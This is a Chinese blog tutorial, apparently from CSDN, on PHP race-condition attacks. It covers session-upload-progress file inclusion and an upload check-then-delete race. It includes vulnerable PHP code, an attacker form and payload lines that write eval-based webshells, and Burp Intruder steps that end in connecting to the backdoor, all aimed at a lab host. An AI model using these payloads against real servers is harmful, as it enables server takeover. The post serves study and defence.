深入解析条件竞争之文件上传和文件包含

于 2024-08-01 00:00:00 发布
阅读量480 收藏 7
点赞数 18
分类专栏: 网络空间安全 文章标签: 安全 web安全 安全性测试 网络安全 安全威胁分析 安全架构 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80064376/article/details/140803722
版权

文章目录

条件竞争漏洞简介

条件竞争漏洞(Race Condition)是指在多线程或多进程环境中,多个操作的执行顺序未被正确控制,导致意外行为或安全问题。在 PHP 会话管理中,特别是在文件上传和会话数据处理过程中,可能会出现这样的漏洞。

文件包含之条件竞争

  1. 概念

    1. 通常一个session建立是会被session锁定机制进行锁住,防止多个并发请求同时修改session数据,这个漏洞的原理是利用了PHP_SESSION_UPLOAD_PROGRESS 特性,当 PHP 处理文件上传请求时,会短暂解锁会话文件,允许并发请求访问,攻击者利用这个窗口,发送包含恶意 PHP_SESSION_UPLOAD_PROGRESS 字段的请求来达到任意命令执行的目的

  2. 靶场介绍

    1. 网站

      网站:http://43.139.186.80/1.php
<?php
if (isset($_GET['file'])) {
    $file = $_GET['file'];
//    $file = str_replace("php", "???", $file); 
    $file = str_replace("data", "???", $file); 
//    $file = str_replace(":", "???", $file); 
    $file = str_replace(".", "???", $file); 
    include($file);
} else {
    highlight_file(__FILE__);
}
?>
攻击者的网站:
<!DOCTYPE html>
<html>12
<body>
<form action="http://43.139.186.80/1.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php fputs(fopen('shell.php','w'),'<?php @eval($_GET[cmd])?>')?>" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
<?php
session_start();
?>
//记得form表单更换为上面的为受害者网站,value值为执行函数,目的是在当前网站下创建一个新的木马shell.php

  3. 复现

    1. 攻击者在自己的网站中上传任意文件,捉包,放到攻击者模块

    2. 在数据包中添加cookie和session字段

    3. 攻击模块配置如下

    4. 在进行访问缓存文件的数据包,http://43.139.186.80/1.php?file=C:\phpstudy_pro\Extensions\tmp\tmp\sess_exp,路径可以在phpinfo中的session.save_path值中找到,名称是sess_+你刚才写的名称,捉包,攻击模块配置和上面一样

    5. 同时发包,看返回的数据长度,出现数值不同说明攻击成功

文件下载之条件竞争

  1. 概念

    1. 这个漏洞主要是利用代码的逻辑漏洞,比如说代码中将文件存入服务器中在检查文件是否违规,违规就删除,但是攻击者通过在服务器检查和删除操作的间隙中,再次生成木马就可以绕过了

  2. 代码审计

    1.   <?php
      header("Content-type: text/html;charset=utf-8");
      error_reporting(0);
      //设置上传目录
      define("UPLOAD_PATH", dirname(__FILE__) . "/upload/");
      define("UPLOAD_URL_PATH", str_replace($_SERVER['DOCUMENT_ROOT'], "", UPLOAD_PATH));
      if (!file_exists(UPLOAD_PATH)) {
          mkdir(UPLOAD_PATH, 0755);
      }
      $is_upload = false;
      if (!empty($_POST['submit'])) {
          $name = basename($_FILES['file']['name']);
          $ext = pathinfo($name)['extension'];
          $upload_file = UPLOAD_PATH . '/' . $name;
          $whitelist = array('jpg','png','gif','jpeg');
  //UPLOAD_PATH . $name这个函数不对,这个函数是直接将上传的文件上传到最终路径再进行检查,只需要将其改为$upload_file函数即可,这个函数是将其上传带临时文件目录下,通过才可以到最终目录
          if (move_uploaded_file($_FILES['file']['tmp_name'], UPLOAD_PATH . $name)) {
              if(in_array($ext,$whitelist)){
                  $rename_file = rand(10, 99).date("YmdHis").".".$ext;
                  $img_path = UPLOAD_PATH . '/'. $rename_file;
                  rename($upload_file, $img_path);
                  $is_upload = true;
              }else{
                  echo "<script>black();</script>";
                  unlink($upload_file);
              }
          } 
      }
  ?>

  3. 复现流程:

    1. 上传1.php,捉包,改包

      1. 插入攻击语句

        1.   <?php fputs(fopen('xiao.php','w'),'<?php eval($_REQUEST[1]);?>');?>
  //这个语句就是创建xiao.php,在在其里面写入木马

      2. 放入intruder模块中,配置如图

      3. 开始attack

    2. 在上传一个访问1.php的包,也就是执行刚才的数据包

      1. 捉包,放入intruder模块,配置如下,发包

      2. attack

    3. 在游览器中一直尝试看能不能连接上新生成的后门,即xiao.php

      1. 页面发生改变

      2. 蚁剑连接即可

总结

条件竞争漏洞在多线程或多进程环境中是一个常见的问题,特别是在文件上传和会话管理中。通过上述两个实际案例,我们可以清楚地看到条件竞争漏洞的危害及其利用方式。同时,了解这些漏洞的存在有助于开发者在编写代码时更加谨慎,从而避免类似的安全问题。防御措施包括对敏感操作进行锁定、增加检查步骤,以及对用户输入进行严格验证。希望本文能帮助读者更好地理解和防御条件竞争漏洞。

CongSec
关注
  • 18
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
深入了解Golang中多线程读取大文件
canduecho的专栏
06-27 1065
在golang中,多线程读取一个大文件是一个常见的需求。本文将详细解释如何实现这个功能,并介绍学习目标和学习内容。
上传绕过php文件改为图片,文件上传漏洞另类绕过技巧及挖掘案例全汇总
weixin_28744601的博客
03-12 1273
文件上传漏洞作为获取服务器权限最快的方式,虽然相关资料很多,但很多人对上传校验方式、如何针对性绕过检测、哪种上传和解析的场景会产生危害等还是比较模糊。本文作一些阐述,然后补充一些除了上传webshell的其他非常规挖掘姿势,包括XSS、重定向、Dos、CSRF等等。1、基础知识:要深入了解文件上传,必须了解上传属性、常见文件的结构、图形处理函数等内容。1)报文特点:观察文件上传报文的特点:Hea...
文件上传漏洞解析及简单绕过技巧
秋水的博客
09-07 2618
文件上传漏洞简介 什么是文件上传漏洞? 简单来说就是,攻击者向服务器上上传了服务器可以解析的动态脚本文件,这里上传的文件可以是木马,病毒,恶意脚本或者Webshell等 这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果 为什么会产生文件上传漏洞? 这是因为,开发人员由于大意...
细说——文件上传漏洞(另附文件上传靶场通关记录)
LainWith的博客
10-11 2159
目录漏洞描述漏洞危害常见上传点和绕过方式上传点后缀绕过解析漏洞常见绕过类型脑图漏洞在系统中的差异IIS 5.x/6.0解析漏洞Nginx 解析漏洞Apache 解析漏洞靶场环境准备理解文件上传Pass-1-js检查【前端绕过】Pass-2-只验证Content-type【考核:MIME绕过】Pass-3-黑名单绕过【考核:特殊解析后缀】Pass-4-.htaccess绕过【黑名单绕过】Pass-5-大小写绕过Pass-6-空格绕过【黑名单绕过】Pass-7-点绕过【黑名单绕过】Pass-8-::$DATA绕
EdgeOne安全专项实践:上传文件漏洞攻击详解与防范措施
最新发布
公众号:该用户快成仙了
07-26 938
通过本文,我们深入探讨了文件上传漏洞攻击的多种案例和防范措施,以及在搭建攻击靶场时的实际操作。从前端和后端的校验漏洞,到利用Apache配置文件和文件包含漏洞的攻击方式,每一步都展示了安全防护的重要性。在学习和实践过程中,我们不仅仅关注如何进行攻击,更着重于如何保护自己的服务器免受此类攻击。我们使用了EdgeOne作为一个解决方案的示例,展示了如何利用其提供的防护规则来有效防御文件上传漏洞。无论是在靶场搭建过程中的细节操作,还是在攻击案例的分析过程中,安全意识和防护措施的实施都显得至关重要。
2024年【网络安全文件上传漏洞详解】
2301_77121488的博客
05-01 973
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
文件上传漏洞
2301_80661529的博客
03-03 1283
文件上传漏洞是指在Web应用程序中,由于开发人员对用户上传文件的功能设计和实现不够严谨,导致攻击者能够上传恶意文件(如Webshell、木马等)到服务器,进而可能获取服务器的控制权或者进行其他非法操作的安全漏洞。文件类型检查不足:攻击者可通过修改文件扩展名或MIME类型,上传非预期类型的文件,如将PHP脚本伪装成图片文件。文件内容验证缺失:即使上传文件的扩展名正确,服务器也应进一步检查文件内容,确认其实际格式与声称的格式相符。上传目录权限过高。
复现文件上传漏洞(靶场练习)
Au
11-10 7749
最近越来越感觉菜了,又把各种漏洞基础原理深入理解玩了玩,巩固一下。然后找到一个不错的上传漏洞汇总的靶场,记录一下。 靶场源码地址:github.com/c0ny1/upload-labs 我这里为了方便,就下载了靶主已经集成配置好的环境进行本地搭建。地址:github.com/c0ny1/upload-labs/releases 本地搭建好是下面这个页面: 考察点: 直接开...
网络安全-文件上传漏洞的原理、攻击与防御_文件上传漏洞原理
2401_84253037的博客
04-29 659
文件上传漏洞是指用户上传了一个可执行的脚本文件(php、jsp、xml、cer等文件),而WEB系统没有进行检测或逻辑做的不够安全文件上传功能本身没有问题,问题在于上传后如何处理及解释文件。通过js代码,对文件后缀进行判断。js的检测基本没有了,开始使用后端代码进行检测,虽然进行MIME检测是使用的后端代码,但是,依然是从客户端获取的,可以从客户端修改,我还是归于上传这一类了。简单来说,在请求头中Content-Type:type/subtype来表明类型,常见的有text/plain。
JS FormData上传文件的设置方法
12-08
在这个场景中,我们将深入探讨如何使用 `FormData` 在Vue.js中通过axios库来上传文件,并解决可能遇到的问题。 首先,我们来看一下HTML部分,创建一个用于选择文件的表单: ```html ``` 这里的重点在于`...
文件上传插件
06-10
在本文中,我们将深入探讨一个名为"文件上传插件"的工具,特别关注其与jQuery-File-Upload-jquery-ui相关的知识点。 首先,文件上传插件的核心目的是简化Web应用程序中的文件上传流程。在没有此类插件的情况下,...
安卓文件下载上传解压相关-超级好用的多线程资源下载器支持断点续传并有通知栏显示很流畅.zip
07-29
在安卓平台上,文件的下载、上传和解压是常见的操作,尤其对于开发者来说,了解如何实现这些功能至关重要。本资源提供了一个高效的多线程下载器,它具备断点续传和通知栏显示的功能,能够提升用户下载体验。下面将...
渗透测试文件上传漏洞笔记知识梳理图,适用于学习渗透测试初学者学习,仅供参考学习
06-02
总之,学习和理解文件上传漏洞及其利用与防御方法是渗透测试人员的基本技能,它涉及到服务器配置、文件解析机制、Web应用程序设计等多个层面,只有深入理解这些知识,才能有效保护网站免受此类攻击。
读写Excel jxl.jar 读xml (log4j 文件上传下载笔记).rar
09-19
综上所述,掌握jxl.jar的Excel操作、XML解析、log4j日志管理和文件上传下载技术,能够极大地提升你在IT领域的专业能力。在实际项目中,这些工具和技术将帮助你更有效地处理数据,调试代码,以及实现用户友好的文件...
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1070
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
人工智能:大语言模型提示注入攻击安全风险分析报告下载
cybtec的博客
07-25 1115
语言模型提示注入攻击安全风险分析报告下载
安全与服务的双重奏:探究ISO20000和ISO27001的企业变革力量
xinbiao001的博客
07-25 941
ISO20000是一个面向机构的IT服务管理标准,旨在提供建立、实施、运作、监控、评审、维护和改进IT服务管理体系(ITSM)的模型。它主要关注的是IT服务管理的流程和质量,帮助企业建立高效的IT服务支持,确保IT服务与企业业务目标一致,提高信息技术服务和运营效率,控制IT风险及相关的成本。例如,华为技术有限公司就通过实施这两项体系,提高了内部IT信息安全管理规范,改善了员工对信息安全服务的认知,提升了品牌形象,并促进了与客户的关系。成功的关键在于管理层对这一过程的承诺,以及员工对标准和流程的认同和遵循。
JAW:一款针对客户端JavaScript的图形化安全分析框架
FreeBuf_的博客
07-25 1711
JAW是一款针对客户端JavaScript的图形化安全分析框架,该工具基于esprima解析器和EsTree SpiderMonkey Spec实现其功能,广大研究人员可以使用该工具分析Web应用程序和基于JavaScript的客户端程序的安全性。7、设计并执行定制的安全相关程序分析,包括预定义 JavaScript 源和接收器之间的数据流分析、控制流和可达性分析、利用 DOM 快照解析 DOM 查询选择器、通过抽象语法树 (AST) 进行模式匹配等;5、支持交互式检测或自动检测不安全的程序行为;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

CongSec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值